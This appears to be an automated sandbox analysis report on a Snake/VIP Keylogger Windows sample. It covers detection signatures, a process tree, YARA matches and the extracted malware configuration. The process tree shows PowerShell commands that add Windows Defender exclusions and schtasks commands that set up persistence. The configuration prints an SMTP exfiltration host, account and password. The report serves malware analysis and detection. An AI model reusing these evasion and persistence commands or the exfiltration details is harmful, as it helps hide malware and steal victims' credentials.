Edit tour

Windows Analysis Report
PvAmrCZENy.exe

Overview

General Information

Sample name:	PvAmrCZENy.exe renamed because original name is a hash value
Original sample name:	b9581e9af28f052e463acd6117271db974830bba5a7ba5825068596947e872bd.exe
Analysis ID:	1631776
MD5:	9a7aa05c524e4fb22014c30c6f9c7576
SHA1:	e093274645aebbd22bb243279d6d6511c53e0f52
SHA256:	b9581e9af28f052e463acd6117271db974830bba5a7ba5825068596947e872bd
Tags:	exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PvAmrCZENy.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\PvAmrCZENy.exe" MD5: 9A7AA05C524E4FB22014C30C6F9C7576)

powershell.exe (PID: 6240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2872 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2872 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

PvAmrCZENy.exe (PID: 6120 cmdline: "C:\Users\user\Desktop\PvAmrCZENy.exe" MD5: 9A7AA05C524E4FB22014C30C6F9C7576)

yxXYABHh.exe (PID: 5912 cmdline: C:\Users\user\AppData\Roaming\yxXYABHh.exe MD5: 9A7AA05C524E4FB22014C30C6F9C7576)

schtasks.exe (PID: 7268 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

yxXYABHh.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\yxXYABHh.exe" MD5: 9A7AA05C524E4FB22014C30C6F9C7576)

svchost.exe (PID: 7564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e610:$a1: get_encryptedPassword 0x71430:$a1: get_encryptedPassword 0x2eb98:$a2: get_encryptedUsername 0x719b8:$a2: get_encryptedUsername 0x2e283:$a3: get_timePasswordChanged 0x710a3:$a3: get_timePasswordChanged 0x2e39a:$a4: get_passwordField 0x711ba:$a4: get_passwordField 0x2e626:$a5: set_encryptedPassword 0x71446:$a5: set_encryptedPassword 0x31342:$a6: get_passwords 0x74162:$a6: get_passwords 0x316d6:$a7: get_logins 0x744f6:$a7: get_logins 0x3132e:$a8: GetOutlookPasswords 0x7414e:$a8: GetOutlookPasswords 0x30ce7:$a9: StartKeylogger 0x73b07:$a9: StartKeylogger 0x3162f:$a10: KeyLoggerEventArgs 0x7444f:$a10: KeyLoggerEventArgs 0x30d87:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e630:$a1: get_encryptedPassword 0x2ebb8:$a2: get_encryptedUsername 0x2e2a3:$a3: get_timePasswordChanged 0x2e3ba:$a4: get_passwordField 0x2e646:$a5: set_encryptedPassword 0x31362:$a6: get_passwords 0x316f6:$a7: get_logins 0x3134e:$a8: GetOutlookPasswords 0x30d07:$a9: StartKeylogger 0x3164f:$a10: KeyLoggerEventArgs 0x30da7:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36eaa0:$a1: get_encryptedPassword 0x3b1ac0:$a1: get_encryptedPassword 0x3f48e0:$a1: get_encryptedPassword 0x36f028:$a2: get_encryptedUsername 0x3b2048:$a2: get_encryptedUsername 0x3f4e68:$a2: get_encryptedUsername 0x36e713:$a3: get_timePasswordChanged 0x3b1733:$a3: get_timePasswordChanged 0x3f4553:$a3: get_timePasswordChanged 0x36e82a:$a4: get_passwordField 0x3b184a:$a4: get_passwordField 0x3f466a:$a4: get_passwordField 0x36eab6:$a5: set_encryptedPassword 0x3b1ad6:$a5: set_encryptedPassword 0x3f48f6:$a5: set_encryptedPassword 0x3717d2:$a6: get_passwords 0x3b47f2:$a6: get_passwords 0x3f7612:$a6: get_passwords 0x371b66:$a7: get_logins 0x3b4b86:$a7: get_logins 0x3f79a6:$a7: get_logins
Process Memory Space: PvAmrCZENy.exe PID: 7112	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PvAmrCZENy.exe PID: 7112	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PvAmrCZENy.exe PID: 7112	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PvAmrCZENy.exe PID: 7112	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PvAmrCZENy.exe PID: 7112	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6e393:$a1: get_encryptedPassword 0x6e82c:$a2: get_encryptedUsername 0x6e028:$a3: get_timePasswordChanged 0x6e133:$a4: get_passwordField 0x6e3a9:$a5: set_encryptedPassword 0x70bbb:$a6: get_passwords 0x70e92:$a7: get_logins 0x70ba7:$a8: GetOutlookPasswords 0x705e9:$a9: StartKeylogger 0x70e00:$a10: KeyLoggerEventArgs 0x70689:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PvAmrCZENy.exe PID: 6120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PvAmrCZENy.exe PID: 6120	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: yxXYABHh.exe PID: 5912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: yxXYABHh.exe PID: 5912	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: yxXYABHh.exe PID: 5912	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: yxXYABHh.exe PID: 5912	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9063:$a1: get_encryptedPassword 0x44929:$a1: get_encryptedPassword 0x95e1:$a2: get_encryptedUsername 0x44ea7:$a2: get_encryptedUsername 0x8ce5:$a3: get_timePasswordChanged 0x445ab:$a3: get_timePasswordChanged 0x8dfc:$a4: get_passwordField 0x446c2:$a4: get_passwordField 0x9079:$a5: set_encryptedPassword 0x4493f:$a5: set_encryptedPassword 0xbd3d:$a6: get_passwords 0x47603:$a6: get_passwords 0xc0cd:$a7: get_logins 0x47993:$a7: get_logins 0xbd29:$a8: GetOutlookPasswords 0x475ef:$a8: GetOutlookPasswords 0xb6e2:$a9: StartKeylogger 0x46fa8:$a9: StartKeylogger 0xc026:$a10: KeyLoggerEventArgs 0x478ec:$a10: KeyLoggerEventArgs 0xb782:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: yxXYABHh.exe PID: 7320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: yxXYABHh.exe PID: 7320	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.yxXYABHh.exe.4149990.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.yxXYABHh.exe.4149990.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.yxXYABHh.exe.4149990.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.yxXYABHh.exe.4149990.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
8.2.yxXYABHh.exe.4149990.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
8.2.yxXYABHh.exe.4149990.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
8.2.yxXYABHh.exe.4149990.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.yxXYABHh.exe.4149990.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.yxXYABHh.exe.4149990.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.yxXYABHh.exe.4149990.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
8.2.yxXYABHh.exe.4149990.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
8.2.yxXYABHh.exe.4149990.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.PvAmrCZENy.exe.4d93e00.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PvAmrCZENy.exe.4d93e00.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PvAmrCZENy.exe.4d93e00.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PvAmrCZENy.exe.4d93e00.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.PvAmrCZENy.exe.4d93e00.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.PvAmrCZENy.exe.4d93e00.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
8.2.yxXYABHh.exe.3949970.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.yxXYABHh.exe.3949970.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.yxXYABHh.exe.3949970.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.yxXYABHh.exe.3949970.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
8.2.yxXYABHh.exe.3949970.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
8.2.yxXYABHh.exe.3949970.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
8.2.yxXYABHh.exe.3949970.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.yxXYABHh.exe.3949970.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.yxXYABHh.exe.3949970.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.yxXYABHh.exe.3949970.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
8.2.yxXYABHh.exe.3949970.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
8.2.yxXYABHh.exe.3949970.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb50c0:$a1: get_encryptedPassword 0xf80e0:$a1: get_encryptedPassword 0x13af00:$a1: get_encryptedPassword 0xb5648:$a2: get_encryptedUsername 0xf8668:$a2: get_encryptedUsername 0x13b488:$a2: get_encryptedUsername 0xb4d33:$a3: get_timePasswordChanged 0xf7d53:$a3: get_timePasswordChanged 0x13ab73:$a3: get_timePasswordChanged 0xb4e4a:$a4: get_passwordField 0xf7e6a:$a4: get_passwordField 0x13ac8a:$a4: get_passwordField 0xb50d6:$a5: set_encryptedPassword 0xf80f6:$a5: set_encryptedPassword 0x13af16:$a5: set_encryptedPassword 0xb7df2:$a6: get_passwords 0xfae12:$a6: get_passwords 0x13dc32:$a6: get_passwords 0xb8186:$a7: get_logins 0xfb1a6:$a7: get_logins 0x13dfc6:$a7: get_logins
0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6484:$s1: UnHook 0xf94a4:$s1: UnHook 0x13c2c4:$s1: UnHook 0xb648b:$s2: SetHook 0xf94ab:$s2: SetHook 0x13c2cb:$s2: SetHook 0xb6493:$s3: CallNextHook 0xf94b3:$s3: CallNextHook 0x13c2d3:$s3: CallNextHook 0xb64a0:$s4: _hook 0xf94c0:$s4: _hook 0x13c2e0:$s4: _hook
0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c4e0:$a1: get_encryptedPassword 0x17f500:$a1: get_encryptedPassword 0x1c2320:$a1: get_encryptedPassword 0x13ca68:$a2: get_encryptedUsername 0x17fa88:$a2: get_encryptedUsername 0x1c28a8:$a2: get_encryptedUsername 0x13c153:$a3: get_timePasswordChanged 0x17f173:$a3: get_timePasswordChanged 0x1c1f93:$a3: get_timePasswordChanged 0x13c26a:$a4: get_passwordField 0x17f28a:$a4: get_passwordField 0x1c20aa:$a4: get_passwordField 0x13c4f6:$a5: set_encryptedPassword 0x17f516:$a5: set_encryptedPassword 0x1c2336:$a5: set_encryptedPassword 0x13f212:$a6: get_passwords 0x182232:$a6: get_passwords 0x1c5052:$a6: get_passwords 0x13f5a6:$a7: get_logins 0x1825c6:$a7: get_logins 0x1c53e6:$a7: get_logins
0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d951:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbae:$a4: \Orbitum\User Data\Default\Login Data 0xc09ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e58d:$a5: \Kometa\User Data\Default\Login Data 0xc13ad:$a5: \Kometa\User Data\Default\Login Data
0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13d8a4:$s1: UnHook 0x1808c4:$s1: UnHook 0x1c36e4:$s1: UnHook 0x13d8ab:$s2: SetHook 0x1808cb:$s2: SetHook 0x1c36eb:$s2: SetHook 0x13d8b3:$s3: CallNextHook 0x1808d3:$s3: CallNextHook 0x1c36f3:$s3: CallNextHook 0x13d8c0:$s4: _hook 0x1808e0:$s4: _hook 0x1c3700:$s4: _hook
0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

